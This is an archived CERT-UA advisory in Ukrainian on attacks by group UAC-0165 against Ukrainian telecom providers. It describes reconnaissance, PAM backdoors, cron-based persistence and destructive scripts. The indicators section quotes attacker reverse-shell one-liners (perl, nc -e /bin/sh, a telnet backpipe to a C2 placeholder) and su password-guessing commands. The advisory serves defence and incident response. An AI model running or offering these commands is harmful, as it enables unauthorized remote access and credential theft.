CERT-UA
Archived: 2026-04-05 15:46:43 UTC
Загальна інформація
За даними публічних джерел за період з 11.05.2023 по 27.09.2023 організованою групою зловмисників, що
відстежується за ідентифікатором UAC-0165, здійснено втручання в інформаційно-комунікаційні системи
(ІКС) не менше ніж 11 провайдерів телекомунікацій України, що, серед іншого, призвело до перебоїв в
наданні послуг споживачам.
Урядовою командою реагування на комп’ютерні надзвичайні події України CERT-UA у тісній взаємодії з
фахівцями одного з провайдерів вжито заходів з дослідження інциденту, завдяки чому встановлено
обставини кібератак, з'ясовано характерні тактики, техніки та процедури зловмисників, а також розкрито
зловмисний задум щодо реалізації кіберзагроз на ряді аналогічних підприємств.
В умовах невпинної цифровізації значної кількості сфер сучасного життя, ураховуючи персистентну
загрозу втрати зв'язку в результаті кінетичних атак на телекомунікації та об'єкти енергозабезпечення, стале
функціонування операторів та провайдерів є суспільно важливою потребою.
З метою відбиття агресії в кіберпросторі, закликаємо українських провайдерів переглянути власні поверхні
атак, врахувати викладені технічні деталі та, у разі виявлення (ознак) інцидентів інформаційної безпеки,
невідкладно звертатися до CERT-UA з метою ініціювання заходів з реагування.
Слід враховувати, що інцидент, досліджений належним чином, підвищує вірогідність недопущення
реалізації кіберзагроз на інших об'єктах нашої держави.
Зведена (не вичерпна) інформація щодо особливостей здійснення кібератак на українських провайдерів
наведена нижче.
Технічна інформація
Як правило першим етапом кібератаки є розвідка, що починається з "грубого" сканування підмереж
(автономної системи) провайдера за типовим набором мережевих портів із застосуванням, зокрема,
masscan. Приклад застосованого конфігураційного файлу, а також скрипта для запуску masscan наведено
на рис.1-2, відповідно.
https://cert.gov.ua/article/6123309
Page 1 of 11

Рис.1 Приклад конфігураційного файлу masscan
Рис.2 Приклад скрипта для запуску masscan з переліком типових мережевих портів (conf.txt)
У випадку ідентифікації інтерфейсів управління (наприклад, SSH, RDP), за умови не обмеження доступу
до останніх, ініціюється підбір автентифікаційних даних. У разі виявлення ознак вразливостей
https://cert.gov.ua/article/6123309
Page 2 of 11

здійснюється їхня експлуатація. Публічно доступні сервіси (вебдодатки), такі як білінг, особистий кабінет
користувача, хостингові сервери (та вебсайти) тощо, аналізуються за допомогою спеціалізованих програм,
в тому числі: ffuf, dirbuster, gowitness, nmap тощо.
Зауважимо (!), що активність по розвідці та експлуатації проводиться із заздалегідь скомпрометованих
серверів, розміщених, зокрема, в українському сегменті мережі Інтернет. Для маршрутизації трафіку через
такі вузли застосовуються проксі-сервери dante, socks5 та інші.
Детальний аналіз серверів, що використовуються як плацдарм для проведення кібератак, дозволив
підтвердити факт їхньої завчасної компрометації. Крім того, встановлено додаткові ознаки такої
компрометації.
1. Зазвичай, що також справедливо і для серверів хостингу, зловмисники встановлюють шкідливий PAM-модуль (відстежується як POEMGATE), що надає можливість автентифікуватися із статично визначеним
паролем та зберігає введені під час автентифікації логіни та паролі у файл в XOR-кодованому вигляді
(рис.3). Такі бекдори встановлюються заздалегідь та, з плином часу, надають змогу отримати актуальні
автентифікаційні дані адміністраторів, які, в свою чергу, доволі часто використовуються для доступу до
іншого серверного та мережевого обладнання.
https://cert.gov.ua/article/6123309
Page 3 of 11

https://cert.gov.ua/article/6123309
Page 4 of 11

Рис.3 Приклад декомпільованого програмного коду POEMGATE
2. З метою обходу налаштувань, пов'язаних з обмеженням можливості використання командної оболонки
(shell), оригінальні файли "/bin/false", "/bin/nologin" замінюються на "bash".
3. Видалення ознак несанкціонованого доступу досягається, серед іншого, запуском утиліти WHITECAT.
4. Додатково на сервер може встановлюватися варіант програми POSEIDON ("/lib/x86_64-linux-gnu/libs.so"), функціонал якої містить повний спектр засобів віддаленого управління ЕОМ. При цьому,
персистентність POSEIDON забезпечується шляхом підміни (модифікації) легітимного бінарного файлу
"/usr/sbin/cron", в структуру якого додається програмний код, що створює потік з аргументом (start_routine)
у вигляді функції "RunMain", яка імпортується з "libc.so" (рис.4):
https://cert.gov.ua/article/6123309
Page 5 of 11

Рис.4 Приклад коду модифікованого cron для виклику "RunMain" з метою запуску POSEIDON
У випадку надання провайдером послуг хостингу, після компрометації вебсайту на вебсервер може
завантажуватися бекдор Weevely. Якщо сервер знаходиться в межах ІКС провайдера (та має "внутрішні"
інтерфейси), він може бути використаний для розвитку атаки на інші елементи DMZ і/або локальної
обчислювальної мережі.
Окрім спеціалізованих програм, персистентний несанкціонований доступ до інфраструктури провайдера
реалізується за допомогою штатних облікових записів VPN (зазначеному сприяє відсутність
https://cert.gov.ua/article/6123309
Page 6 of 11

багатофакторної автентифікації на основі одноразового коду з додатку). Очевидною ознакою
компрометації VPN є підключення з IP-адрес мережі TOR та сервісів VPN, в тому числі тих, що
"класифікуються" як українські.
Після проникнення до ІКС основні зусилля зосереджуються на ідентифікації так званих джамп-хостів та
комп'ютерів системних адміністраторів. Якщо подальше горизонтальне переміщення унеможливлене
списками контролю доступу мережевого обладнання, зловмисники можуть вносити зміни в їх
налаштування.
Так як з часів "КіберБеркуту" майже кожен злам супроводжується публікацією "пруфів", частина часу
присвячується ексфільтрації документів, креслень, схем, договорів. Принагідно, для підсилення "ефекту"
та надання більшої публічності, зловмисники вдаються до викрадення паролів від офіційних облікових
записів в Telegram, Facebook, а також токенів для розсилання SMS, тощо. Тому слід окремо звернути увагу
на убезпечення таких "медійних" акаунтів шляхом налаштування багатофакторної автентифікації.
На заключному етапі кібератаки здійснюється виведення з ладу активного мережевого та серверного
обладнання, а також систем зберігання даних. Зазначеному сприяє використання однакових паролів та не
обмежений доступ до інтерфейсів управління цим обладнанням. Крім того, відсутність резервних копій
актуальних конфігурацій негативно впливає на можливість оперативного відновлення працездатності.
Приклад одного зі скриптів-деструкторів наведено на рис.5.
Рис.5 Приклад скрипта-деструктора
Як приклад, для порушення штатного режиму функціонування обладнання Mikrotik може застосовуватися
відповідний функціонал скриптів та запланованих задач. Приклад одного зі скриптів наведено на рис.6.
https://cert.gov.ua/article/6123309
Page 7 of 11

Рис.6 Приклад скрипта та завдання для Mikrotik
Наполегливо рекомендуємо взяти до уваги інформацію, що викладена у статті "Як бути відповідальним та
втримати кіберфронт" (https://cert.gov.ua/article/5436463).
Користуючись нагодою висловлюємо вдячність операторам і провайдерам телекомунікацій України за
сприяння у боротьбі з кіберзагрозами та засвідчуємо готовність щодо залучення CERT-UA для
дослідження кібератак, обміну інформацією, перевірки аномалій тощо.
Індикатори кіберзагроз
Файли:
2b88885fb57e28497522238bd8f8befc  8ddd681dd834ab66f6a1c00ba2830717bf845de5639708eb8e8ab795ffd1df5a
5d9a661f35d4e136d389bea878c4252f  eb01925836eed1dbd85a8ab9aa05c5c45dc051abaae9e67db3a53489d776b6c2
20a07ba71cab0f92c566b31e96fdf0e8  9060ca8e829fc136d1ecd95a5204abb48f3ce5b7339619c5668c7e176dcbb235
a74dbcae530f52f62cbdcef3dc18feeee9c5dc9cec95f31cea2eb88cc26a35d29c5f89f23bff6a7cfa1250dec6d5701a
45fad72d370ff88c5b349cb741cc26ce  8fb3ed6261a2358e0890bfd544e515af232f87d3aef947e09f640da7cc1b89d9
59f2c3f6e4baf721c02a66179147241a  0e24a1268212a790bc3993750f194ac1e0996a6770b32b498341f06abac45d81
75cde685cd3f00f354155e3c433698c7  e4cff7071e184e3f1bfedfe30afa52ddd2cac1a00983508d142e51ecebfcba14
61b70767326387f141a18e2fbb250a68  b5ec1d43462a770d207eefb906516631e4d80eea55779509616b58b39a764455
302f158ca6f6094e90bd43f7748dd65f  65c880f2a3833898c54d7f48ee0709a13887376b2ea5bc933b2e70f29614e728
Мережеві:
eurotelle[.]com
(IP-адреси, використані для SSH/VPN доступу)
103[.]251.167.20
103[.]251.167.21
104[.]244.72.8
107[.]189.30.69
139[.]99.237.205
146[.]59.233.33
146[.]59.35.246
156[.]146.63.139
158[.]118.218.193
https://cert.gov.ua/article/6123309
Page 8 of 11

1
62[.]247.73.192
162[.]247.74.201
162[.]247.74.206
162[.]247.74.216
162[.]247.74.27
162[.]247.74.74
167[.]86.94.107
171[.]25.193.20
171[.]25.193.235
171[.]25.193.25
171[.]25.193.77
171[.]25.193.78
179[.]43.159.195
179[.]43.159.198
182[.]118.218.193
185[.]100.86.121
185[.]100.87.41
185[.]129.61.129
185[.]129.61.7
185[.]129.62.62
185[.]130.47.58
185[.]14.28.207
185[.]165.169.239
185[.]220.101.152
185[.]220.102.240
185[.]220.102.241
185[.]220.102.242
185[.]220.102.247
185[.]220.102.251
185[.]220.102.252
185[.]220.102.253
185[.]220.102.254
185[.]220.102.8
185[.]220.103.8
185[.]233.100.23
185[.]235.146.29
185[.]241.208.206
185[.]241.208.232
185[.]246.188.60
185[.]246.188.67
185[.]246.188.74
185[.]254.75.55
185[.]34.33.2
185[.]56.83.83
185[.]67.82.114
192[.]42.116.13
192[.]42.116.16
https://cert.gov.ua/article/6123309
Page 9 of 11

192[.]42.116.18
192[.]42.116.23
192[.]42.116.25
193[.]218.118.158
193[.]218.118.182
195[.]69.202.145
203[.]28.246.189
204[.]28.48.77
204[.]8.156.142
217[.]12.208.73
23[.]129.64.133
2[.]56.164.52
2[.]58.56.101
45[.]139.122.241
45[.]141.215.111
45[.]154.98.225
46[.]182.21.248
51[.]89.153.112
5[.]181.80.132
5[.]252.118.19
5[.]255.99.205
5[.]45.73.243
62[.]102.148.68
62[.]182.84.146
77[.]48.28.204
77[.]48.28.236
79[.]137.194.146
80[.]67.167.81
82[.]221.128.191
84[.]239.46.144
89[.]147.111.106
89[.]248.165.181
91[.]208.75.153
91[.]208.75.3
91[.]224.92.110
94[.]102.51.15
95[.]214.234.139
95[.]214.55.43
Хостові:
/lib/libc.so.7
/lib/x86_64-linux-gnu/libs.so
/lib/x86_64-linux-gnu/security/pam_unix.so
/tmp/.1
/usr/sbin/wccrt
https://cert.gov.ua/article/6123309
Page 10 of 11

/usr/sbin/wcc
/var/lib/vim‍/ps
/var/lib/vim‍/vfth/scan.sh
expect -c 'spawn su -c "whoami" "%user%"; expect -re "assword"; send "%password%"; expect eof;' 2>&1
perl -e 'use Socket;$i="%C2IP%";$p=3333;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connec
python -c 'import pexpect as p,sys;c=p.spawn("su %user% -c whoami");c.expect(".*assword:");c.sendline
sleep 1; nc -e /bin/sh %C2IP% 3333 2>&1
sleep 1;rm -rf /tmp/backpipe;mknod /tmp/backpipe p;telnet %C2IP% 3333 0</tmp/backpipe | /bin/sh 1>/tm
/bin/false (порушення цілісності/підміна)
/bin/nologin (порушення цілісності/підміна)
/usr/sbin/cron (порушення цілісності/підміна)
Source: https://cert.gov.ua/article/6123309
https://cert.gov.ua/article/6123309
Page 11 of 11